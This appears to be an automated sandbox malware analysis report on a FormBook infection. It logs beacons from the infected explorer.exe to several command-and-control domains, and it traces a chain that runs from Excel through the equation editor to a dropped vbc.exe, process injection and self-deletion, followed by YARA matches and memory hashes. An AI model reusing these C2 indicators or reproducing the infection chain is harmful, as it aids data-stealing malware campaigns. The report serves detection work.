Server: openresty
Date: Wed, 15 Sep 2021 09:20:30 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139ed55-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.22 | 49191 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:05.497116089 CEST | 614 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
Host: www.hanlansmojitovillage.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:22:05.612250090 CEST | 615 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 15 Sep 2021 09:22:05 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139efab-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.22 | 49195 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:43.718801022 CEST | 618 | OUT | GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
Host: www.thaysay.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:22:43.833789110 CEST | 618 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 15 Sep 2021 09:22:43 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139efab-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.22 | 49197 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:53.937608004 CEST | 620 | OUT | GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
Host: www.onpar-golf.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:22:54.053649902 CEST | 620 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 15 Sep 2021 09:22:53 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139ed55-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      15 | 192.168.2.22 | 49198 | 192.99.131.252 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:22:59.159507036 CEST | 621 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:22:59.269926071 CEST | 622 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:22:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      16 | 192.168.2.22 | 49199 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:23:04.295397043 CEST | 622 | OUT | GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:04.410657883 CEST | 623 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:04 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      17 | 192.168.2.22 | 49200 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:23:09.429909945 CEST | 623 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST | 624 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      2 | 192.168.2.22 | 49169 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:05.019635916 CEST | 586 | OUT | GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:05.138832092 CEST | 587 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      3 | 192.168.2.22 | 49170 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:10.217118979 CEST | 588 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:10.331685066 CEST | 588 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      4 | 192.168.2.22 | 49171 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:20.416021109 CEST | 589 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:20.531202078 CEST | 590 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      5 | 192.168.2.22 | 49176 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:19:13.157188892 CEST | 596 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:13.272679090 CEST | 596 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      6 | 192.168.2.22 | 49180 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:19:54.712455034 CEST | 600 | OUT | GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:54.827491045 CEST | 600 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      7 | 192.168.2.22 | 49182 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:20:05.010581970 CEST | 602 | OUT | GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:05.125579119 CEST | 603 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      8 | 192.168.2.22 | 49183 | 192.99.131.252 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:20:10.230083942 CEST | 604 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:10.341188908 CEST | 604 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:20:10 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


Session ID: 9, Source IP: 192.168.2.22, Source Port: 49184, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Sep 15, 2021 11:20:15.364769936 CEST, kBytes transferred: 605, Direction: OUT, Data:
GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Timestamp: Sep 15, 2021 11:20:15.480021954 CEST, kBytes transferred: 606, Direction: IN, Data:
HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      System Behavior

                                                                                      General

Start time: 11:15:22
Start date: 15/09/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fa90000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                      General

Start time: 11:15:45
Start date: 15/09/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                      General

Start time: 11:15:48
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
Reputation: low

                                                                                      General

Start time: 11:15:51
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): false
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                                      General

Start time: 11:15:52
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                      General

Start time: 11:15:54
Start date: 15/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffa10000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

                                                                                      General

Start time: 11:16:21
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0x2f0000
File size: 27136 bytes
MD5 hash: CABB20E171770FF64614A54C1F31C033
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                                                                      General

Start time: 11:16:22
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4acd0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                        Executed Functions

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C6e:
                                                                                        • API String ID: 0-1451620285
                                                                                        • Opcode ID: f2b0a3616bed3e5e95ab0100395f01c2ad557033f74a9c9fb3eee8c820455e65
                                                                                        • Instruction ID: c5791bda4cd0187a4d20f666969a6815a09ba3091417d5d173a29401b33f172f
                                                                                        • Opcode Fuzzy Hash: f2b0a3616bed3e5e95ab0100395f01c2ad557033f74a9c9fb3eee8c820455e65
                                                                                        • Instruction Fuzzy Hash: B4B13874E056599BCB08CFEAC9805EEFBF2BF88310F648565D409AB358E7349941CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e87f29c794f9585a79fc744fe17788cefac196b63cfc0b2f0762a4ebb6bb240
                                                                                        • Instruction ID: 39a79c0192367114f7a2cddee927b01d0c995b1459ed79c056ea123b37d9c2d3
                                                                                        • Opcode Fuzzy Hash: 5e87f29c794f9585a79fc744fe17788cefac196b63cfc0b2f0762a4ebb6bb240
                                                                                        • Instruction Fuzzy Hash: F902D634A11218CFCB14DFB4C891ADDB7B2FF8A304F1195A9E409AB365DB70A985CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32535466e97d7ed346659ef1c051c47622405e88998c8b570d6279b45ebd8365
                                                                                        • Instruction ID: c23a6db24059583559326ac5dc3654c5efdbd3eb3d008a3458d4cedbeadb7fec
                                                                                        • Opcode Fuzzy Hash: 32535466e97d7ed346659ef1c051c47622405e88998c8b570d6279b45ebd8365
                                                                                        • Instruction Fuzzy Hash: FBF1D534A11219CFCB14DFB4C891AADB7B2FF89304F1195A9E409AB365DB30A986CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.479770910.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
